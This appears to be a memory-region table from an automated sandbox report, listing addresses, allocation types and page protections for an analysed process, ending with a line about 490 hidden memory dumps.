1E15F29D000
|
heap
|
page read and write
|
||
|
8880000
|
trusted library allocation
|
page read and write
|
||
|
85EE000
|
heap
|
page read and write
|
||
|
2FED000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E15EE00000
|
heap
|
page read and write
|
||
|
1E15F1A4000
|
heap
|
page read and write
|
||
|
1E15D44B000
|
heap
|
page read and write
|
||
|
167651CD000
|
trusted library allocation
|
page read and write
|
||
|
16761C20000
|
heap
|
page read and write
|
||
|
300A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E15F151000
|
heap
|
page read and write
|
||
|
7FFAACA80000
|
trusted library allocation
|
page read and write
|
||
|
4920000
|
heap
|
page execute and read and write
|
||
|
1E15F17F000
|
heap
|
page read and write
|
||
|
87E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC67000
|
trusted library allocation
|
page read and write
|
||
|
1E15F33A000
|
heap
|
page read and write
|
||
|
1E15D451000
|
heap
|
page read and write
|
||
|
1E15F1FC000
|
heap
|
page read and write
|
||
|
167636F0000
|
heap
|
page read and write
|
||
|
1676418D000
|
trusted library allocation
|
page read and write
|
||
|
8FB0000
|
direct allocation
|
page execute and read and write
|
||
|
1E15D34C000
|
heap
|
page read and write
|
||
|
77F0000
|
trusted library allocation
|
page read and write
|
||
|
1E15F17C000
|
heap
|
page read and write
|
||
|
1E15F19F000
|
heap
|
page read and write
|
||
|
7444000
|
heap
|
page read and write
|
||
|
1E15D230000
|
heap
|
page read and write
|
||
|
16773BAC000
|
trusted library allocation
|
page read and write
|
||
|
1E15F163000
|
heap
|
page read and write
|
||
|
6D6E000
|
stack
|
page read and write
|
||
|
7FFAACCF0000
|
trusted library allocation
|
page read and write
|
||
|
82F0000
|
trusted library allocation
|
page read and write
|
||
|
2CD9000
|
heap
|
page read and write
|
||
|
7FFAACE20000
|
trusted library allocation
|
page execute and read and write
|
||
|
167635E0000
|
heap
|
page readonly
|
||
|
7FFAACD70000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCE0000
|
trusted library allocation
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
16761F70000
|
heap
|
page read and write
|
||
|
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
|
1E15F16E000
|
heap
|
page read and write
|
||
|
1E15F321000
|
heap
|
page read and write
|
||
|
82B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
167635F0000
|
trusted library allocation
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
7D7947F000
|
stack
|
page read and write
|
||
|
850B000
|
stack
|
page read and write
|
||
|
7FFAACCD0000
|
trusted library allocation
|
page read and write
|
||
|
2FF9000
|
trusted library allocation
|
page read and write
|
||
|
739F000
|
stack
|
page read and write
|
||
|
29BC000
|
stack
|
page read and write
|
||
|
1E15D348000
|
heap
|
page read and write
|
||
|
5A01000
|
trusted library allocation
|
page read and write
|
||
|
1E15F3EE000
|
heap
|
page read and write
|
||
|
7FFAACD40000
|
trusted library allocation
|
page read and write
|
||
|
1E15F314000
|
heap
|
page read and write
|
||
|
1E15F15B000
|
heap
|
page read and write
|
||
|
1E15D34B000
|
heap
|
page read and write
|
||
|
8608000
|
heap
|
page read and write
|
||
|
45C523F000
|
stack
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
1676443D000
|
trusted library allocation
|
page read and write
|
||
|
1677BF6F000
|
heap
|
page read and write
|
||
|
7130000
|
heap
|
page read and write
|
||
|
1676370B000
|
heap
|
page read and write
|
||
|
7FFAACA9B000
|
trusted library allocation
|
page read and write
|
||
|
2FB0000
|
trusted library section
|
page read and write
|
||
|
16765990000
|
trusted library allocation
|
page read and write
|
||
|
B9327FB000
|
stack
|
page read and write
|
||
|
81F0000
|
trusted library allocation
|
page read and write
|
||
|
1E15F19C000
|
heap
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
1E15F150000
|
heap
|
page read and write
|
||
|
1E15F1C0000
|
heap
|
page read and write
|
||
|
167635D0000
|
trusted library allocation
|
page read and write
|
||
|
49D9000
|
trusted library allocation
|
page read and write
|
||
|
29F8000
|
stack
|
page read and write
|
||
|
1E15D48B000
|
heap
|
page read and write
|
||
|
45C52BB000
|
stack
|
page read and write
|
||
|
16763AC7000
|
trusted library allocation
|
page read and write
|
||
|
16761C1C000
|
heap
|
page read and write
|
||
|
1E15F1EC000
|
heap
|
page read and write
|
||
|
1E15F18A000
|
heap
|
page read and write
|
||
|
2FE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
1677BF29000
|
heap
|
page read and write
|
||
|
1E15F1C8000
|
heap
|
page read and write
|
||
|
1677BE64000
|
heap
|
page read and write
|
||
|
167659B5000
|
trusted library allocation
|
page read and write
|
||
|
8600000
|
heap
|
page read and write
|
||
|
74BF000
|
heap
|
page read and write
|
||
|
1677C110000
|
heap
|
page read and write
|
||
|
16773B8E000
|
trusted library allocation
|
page read and write
|
||
|
1E15D3BF000
|
heap
|
page read and write
|
||
|
1E15D3BA000
|
heap
|
page read and write
|
||
|
2D24000
|
heap
|
page read and write
|
||
|
1E15F19C000
|
heap
|
page read and write
|
||
|
45C4DFE000
|
stack
|
page read and write
|
||
|
7FFAACA8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
59F1000
|
trusted library allocation
|
page read and write
|
||
|
7409000
|
heap
|
page read and write
|
||
|
1E15D441000
|
heap
|
page read and write
|
||
|
1E15D47C000
|
heap
|
page read and write
|
||
|
7FFAACBA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
764E000
|
stack
|
page read and write
|
||
|
1677BC37000
|
heap
|
page read and write
|
||
|
1677BC95000
|
heap
|
page read and write
|
||
|
45C4EBF000
|
stack
|
page read and write
|
||
|
1E15F197000
|
heap
|
page read and write
|
||
|
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
|
1E15F6DF000
|
heap
|
page read and write
|
||
|
167638A1000
|
trusted library allocation
|
page read and write
|
||
|
B931B6A000
|
stack
|
page read and write
|
||
|
2FE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E15F187000
|
heap
|
page read and write
|
||
|
1E15D488000
|
heap
|
page read and write
|
||
|
1E15D488000
|
heap
|
page read and write
|
||
|
1E15F232000
|
heap
|
page read and write
|
||
|
1E15F1B0000
|
heap
|
page read and write
|
||
|
1E15F251000
|
heap
|
page read and write
|
||
|
1E15F1F4000
|
heap
|
page read and write
|
||
|
507F000
|
trusted library allocation
|
page read and write
|
||
|
16761B90000
|
heap
|
page read and write
|
||
|
6D90000
|
heap
|
page execute and read and write
|
||
|
7FFAACB66000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACCB0000
|
trusted library allocation
|
page read and write
|
||
|
24062720000
|
heap
|
page read and write
|
||
|
8610000
|
heap
|
page read and write
|
||
|
1E15D448000
|
heap
|
page read and write
|
||
|
1E15D350000
|
heap
|
page read and write
|
||
|
484E000
|
stack
|
page read and write
|
||
|
49E0000
|
heap
|
page read and write
|
||
|
7FFB1E0E0000
|
unkown
|
page readonly
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
16761B80000
|
heap
|
page read and write
|
||
|
1E15D45D000
|
heap
|
page read and write
|
||
|
1677BED3000
|
heap
|
page read and write
|
||
|
84CC000
|
stack
|
page read and write
|
||
|
2FE4000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACC50000
|
trusted library allocation
|
page execute and read and write
|
||
|
45C4FB8000
|
stack
|
page read and write
|
||
|
2CC0000
|
heap
|
page read and write
|
||
|
6D95000
|
heap
|
page execute and read and write
|
||
|
1E15F318000
|
heap
|
page read and write
|
||
|
16761C15000
|
heap
|
page read and write
|
||
|
1E15D474000
|
heap
|
page read and write
|
||
|
2D7F000
|
heap
|
page read and write
|
||
|
16761C24000
|
heap
|
page read and write
|
||
|
16765AAA000
|
trusted library allocation
|
page read and write
|
||
|
1E15F1D0000
|
heap
|
page read and write
|
||
|
6E9E000
|
stack
|
page read and write
|
||
|
240627B9000
|
heap
|
page read and write
|
||
|
1E15F1A8000
|
heap
|
page read and write
|
||
|
1E15F6D5000
|
heap
|
page read and write
|
||
|
16763DC5000
|
trusted library allocation
|
page read and write
|
||
|
1E15D41C000
|
heap
|
page read and write
|
||
|
85D0000
|
heap
|
page read and write
|
||
|
1E15D451000
|
heap
|
page read and write
|
||
|
7FFAACD60000
|
trusted library allocation
|
page read and write
|
||
|
1677BD27000
|
heap
|
page execute and read and write
|
||
|
77C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA83000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E15F31F000
|
heap
|
page read and write
|
||
|
16765994000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E102000
|
unkown
|
page readonly
|
||
|
16763610000
|
heap
|
page read and write
|
||
|
16765647000
|
trusted library allocation
|
page read and write
|
||
|
167659A7000
|
trusted library allocation
|
page read and write
|
||
|
1E15F1B8000
|
heap
|
page read and write
|
||
|
2D3B000
|
heap
|
page read and write
|
||
|
1E15F152000
|
heap
|
page read and write
|
||
|
1E15F169000
|
heap
|
page read and write
|
||
|
1E15F31A000
|
heap
|
page read and write
|
||
|
1677BD20000
|
heap
|
page execute and read and write
|
||
|
1E15F33A000
|
heap
|
page read and write
|
||
|
1E15F1C8000
|
heap
|
page read and write
|
||
|
82C0000
|
heap
|
page read and write
|
||
|
1677BD80000
|
heap
|
page read and write
|
||
|
1E15F1F9000
|
heap
|
page read and write
|
||
|
1E15D448000
|
heap
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
1E15D34D000
|
heap
|
page read and write
|
||
|
16764605000
|
trusted library allocation
|
page read and write
|
||
|
3050000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E15F176000
|
heap
|
page read and write
|
||
|
1E15F193000
|
heap
|
page read and write
|
||
|
74200000
|
unkown
|
page readonly
|
||
|
1E15D473000
|
heap
|
page read and write
|
||
|
76CD000
|
stack
|
page read and write
|
||
|
1E15F20D000
|
heap
|
page read and write
|
||
|
77E0000
|
trusted library allocation
|
page read and write
|
||
|
B9324FE000
|
stack
|
page read and write
|
||
|
45C5038000
|
stack
|
page read and write
|
||
|
1E15D3C0000
|
heap
|
page read and write
|
||
|
1E15F351000
|
heap
|
page read and write
|
||
|
1E15F201000
|
heap
|
page read and write
|
||
|
AE5F000
|
direct allocation
|
page execute and read and write
|
||
|
1E15D478000
|
heap
|
page read and write
|
||
|
1E15F350000
|
heap
|
page read and write
|
||
|
74E1000
|
heap
|
page read and write
|
||
|
1677BF53000
|
heap
|
page read and write
|
||
|
1E15D47C000
|
heap
|
page read and write
|
||
|
45C4E79000
|
stack
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC90000
|
trusted library allocation
|
page read and write
|
||
|
3040000
|
heap
|
page readonly
|
||
|
1E15F225000
|
heap
|
page read and write
|
||
|
1E15F177000
|
heap
|
page read and write
|
||
|
860C000
|
heap
|
page read and write
|
||
|
1E15D47C000
|
heap
|
page read and write
|
||
|
6DDF000
|
stack
|
page read and write
|
||
|
8510000
|
heap
|
page read and write
|
||
|
4B47000
|
trusted library allocation
|
page read and write
|
||
|
45C5C8E000
|
stack
|
page read and write
|
||
|
24062700000
|
heap
|
page read and write
|
||
|
8330000
|
trusted library allocation
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
82E0000
|
trusted library allocation
|
page read and write
|
||
|
1E15F168000
|
heap
|
page read and write
|
||
|
8300000
|
heap
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
2CFC000
|
heap
|
page read and write
|
||
|
73D0000
|
heap
|
page read and write
|
||
|
1E15D488000
|
heap
|
page read and write
|
||
|
3030000
|
trusted library allocation
|
page read and write
|
||
|
7422000
|
heap
|
page read and write
|
||
|
B9321FF000
|
stack
|
page read and write
|
||
|
7FFAACC35000
|
trusted library allocation
|
page read and write
|
||
|
16761CCE000
|
heap
|
page read and write
|
||
|
16763615000
|
heap
|
page read and write
|
||
|
1E15F16B000
|
heap
|
page read and write
|
||
|
1E15F3EE000
|
heap
|
page read and write
|
||
|
1676462F000
|
trusted library allocation
|
page read and write
|
||
|
2CD5000
|
heap
|
page read and write
|
||
|
1E15F194000
|
heap
|
page read and write
|
||
|
863A000
|
heap
|
page read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
3012000
|
trusted library allocation
|
page read and write
|
||
|
1E15D310000
|
heap
|
page read and write
|
||
|
1E15F1D5000
|
heap
|
page read and write
|
||
|
45C5D0D000
|
stack
|
page read and write
|
||
|
3015000
|
trusted library allocation
|
page execute and read and write
|
||
|
82AE000
|
stack
|
page read and write
|
||
|
1E15D340000
|
heap
|
page read and write
|
||
|
7FFB1E0E1000
|
unkown
|
page execute read
|
||
|
1677BEF6000
|
heap
|
page read and write
|
||
|
1E15D34E000
|
heap
|
page read and write
|
||
|
1E15D345000
|
heap
|
page read and write
|
||
|
2FC0000
|
trusted library section
|
page read and write
|
||
|
16763DAD000
|
trusted library allocation
|
page read and write
|
||
|
16763DC9000
|
trusted library allocation
|
page read and write
|
||
|
1E15F160000
|
heap
|
page read and write
|
||
|
4968000
|
heap
|
page read and write
|
||
|
1E15D47C000
|
heap
|
page read and write
|
||
|
88C0000
|
direct allocation
|
page read and write
|
||
|
7FFAACB3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
16761C1A000
|
heap
|
page read and write
|
||
|
1677BD30000
|
heap
|
page execute and read and write
|
||
|
1E15F18F000
|
heap
|
page read and write
|
||
|
1677BD60000
|
heap
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page read and write
|
||
|
1E15F1D8000
|
heap
|
page read and write
|
||
|
16763DF0000
|
trusted library allocation
|
page read and write
|
||
|
826D000
|
stack
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
1676461F000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
|
5085000
|
trusted library allocation
|
page read and write
|
||
|
B9323FF000
|
stack
|
page read and write
|
||
|
7FFAACC62000
|
trusted library allocation
|
page read and write
|
||
|
74216000
|
unkown
|
page readonly
|
||
|
488F000
|
stack
|
page read and write
|
||
|
1E15F16D000
|
heap
|
page read and write
|
||
|
1E15D442000
|
heap
|
page read and write
|
||
|
16761C36000
|
heap
|
page read and write
|
||
|
2DB8000
|
heap
|
page read and write
|
||
|
768E000
|
stack
|
page read and write
|
||
|
1E15F1C3000
|
heap
|
page read and write
|
||
|
1E15F1C5000
|
heap
|
page read and write
|
||
|
1E15F314000
|
heap
|
page read and write
|
||
|
45C4BFE000
|
stack
|
page read and write
|
||
|
7421F000
|
unkown
|
page readonly
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD10000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC65000
|
trusted library allocation
|
page read and write
|
||
|
1E15F16D000
|
heap
|
page read and write
|
||
|
45C50BE000
|
stack
|
page read and write
|
||
|
7D7912B000
|
stack
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
16763650000
|
trusted library allocation
|
page read and write
|
||
|
16761C7F000
|
heap
|
page read and write
|
||
|
1E15D442000
|
heap
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
85B0000
|
trusted library allocation
|
page read and write
|
||
|
167659CA000
|
trusted library allocation
|
page read and write
|
||
|
1E15F158000
|
heap
|
page read and write
|
||
|
1677BBE0000
|
heap
|
page read and write
|
||
|
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
|
1E15D487000
|
heap
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACADC000
|
trusted library allocation
|
page execute and read and write
|
||
|
306C000
|
heap
|
page read and write
|
||
|
45C4F36000
|
stack
|
page read and write
|
||
|
7421D000
|
unkown
|
page read and write
|
||
|
49AE000
|
stack
|
page read and write
|
||
|
7FFB1E0F6000
|
unkown
|
page readonly
|
||
|
1E15F1B3000
|
heap
|
page read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
6EDE000
|
stack
|
page read and write
|
||
|
2FF0000
|
trusted library allocation
|
page read and write
|
||
|
6E1E000
|
stack
|
page read and write
|
||
|
1E15F35C000
|
heap
|
page read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
1E15F317000
|
heap
|
page read and write
|
||
|
49F1000
|
trusted library allocation
|
page read and write
|
||
|
1E15F225000
|
heap
|
page read and write
|
||
|
49E8000
|
heap
|
page read and write
|
||
|
4A53000
|
trusted library allocation
|
page read and write
|
||
|
1E15F3EE000
|
heap
|
page read and write
|
||
|
16761F50000
|
heap
|
page read and write
|
||
|
167635B0000
|
trusted library allocation
|
page read and write
|
||
|
7429000
|
heap
|
page read and write
|
||
|
1677BC39000
|
heap
|
page read and write
|
||
|
1E15F204000
|
heap
|
page read and write
|
||
|
B9322FF000
|
stack
|
page read and write
|
||
|
1E15F3EE000
|
heap
|
page read and write
|
||
|
6D80000
|
heap
|
page execute and read and write
|
||
|
7D791AF000
|
unkown
|
page read and write
|
||
|
1E15F319000
|
heap
|
page read and write
|
||
|
1E15D41C000
|
heap
|
page read and write
|
||
|
7FFAACC70000
|
trusted library allocation
|
page execute and read and write
|
||
|
240626F0000
|
heap
|
page read and write
|
||
|
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
1E15F170000
|
heap
|
page read and write
|
||
|
8380000
|
trusted library allocation
|
page read and write
|
||
|
167651E8000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA82000
|
trusted library allocation
|
page read and write
|
||
|
167738A1000
|
trusted library allocation
|
page read and write
|
||
|
24062B55000
|
heap
|
page read and write
|
||
|
7FFAACD30000
|
trusted library allocation
|
page read and write
|
||
|
1676503C000
|
trusted library allocation
|
page read and write
|
||
|
1E15F21E000
|
heap
|
page read and write
|
||
|
167659B9000
|
trusted library allocation
|
page read and write
|
||
|
16761BD0000
|
heap
|
page read and write
|
||
|
45C47D3000
|
stack
|
page read and write
|
||
|
735E000
|
stack
|
page read and write
|
||
|
59FB000
|
trusted library allocation
|
page read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
1E15F1CD000
|
heap
|
page read and write
|
||
|
45C4A7F000
|
stack
|
page read and write
|
||
|
6E5E000
|
stack
|
page read and write
|
||
|
49D0000
|
trusted library allocation
|
page read and write
|
||
|
7140000
|
heap
|
page read and write
|
||
|
74201000
|
unkown
|
page execute read
|
||
|
1E15F1E9000
|
heap
|
page read and write
|
||
|
8320000
|
trusted library allocation
|
page read and write
|
||
|
760E000
|
stack
|
page read and write
|
||
|
8485000
|
trusted library allocation
|
page read and write
|
||
|
1E15F16D000
|
heap
|
page read and write
|
||
|
5A19000
|
trusted library allocation
|
page read and write
|
||
|
1E15F161000
|
heap
|
page read and write
|
||
|
7800000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA84000
|
trusted library allocation
|
page read and write
|
||
|
1677BD84000
|
heap
|
page read and write
|
||
|
1E15F6CD000
|
heap
|
page read and write
|
||
|
1677BBF0000
|
heap
|
page read and write
|
||
|
8870000
|
heap
|
page read and write
|
||
|
16761BDD000
|
heap
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
16763890000
|
heap
|
page execute and read and write
|
||
|
7FFAACD00000
|
trusted library allocation
|
page read and write
|
||
|
48F0000
|
trusted library allocation
|
page read and write
|
There are 490 hidden memdumps, click here to show them.